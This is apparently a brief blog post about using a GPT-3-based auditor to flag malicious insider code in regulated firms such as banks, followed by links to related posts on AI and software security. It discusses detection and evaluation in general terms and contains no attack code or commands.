GPT-3 auditor scans for malicious insider code
A key software security challenge banks and other regulated entities face is detecting malicious code planted by insiders. Peer code review appears to be the most effective (under the right circumstances), with static analysis a very distant second. Source code reviews may detect suspect insider code, but from first hand experience it's quite hit and miss and depends on the scope and intent of the review work, the size of the code base, the familiarity of the code reviewer(s) with not just the source code, but the build chain and glue scripts.
Key question: where does GPT-3 auditor do well, and where does it struggle? - Review the samples included and the results - Test GPT-3 auditor against famous backdoors - how does it fare? - Can one or more classes of back door be consistently flagged for human review?
Related Posts
-
Meta LLaMA leaked: Private AI for the masses
AI Governance Dilemma: Leaked Llama Model Outperforms GPT-3! Explore the debate on trust, policy, and control as cutting-edge AI slips into public domain.
-
Use ChatGPT to examine every npm and PyPI package for security issues
AI-driven Socket identifies and analyzes 227 vulnerable or malicious packages in npm and PyPI repositories.
-
Upgrade your Unit Testing with ChatGPT
Companies with proprietary source code can use public AI to generate regular and adversarial unit tests without disclosing their complete source code to said AI.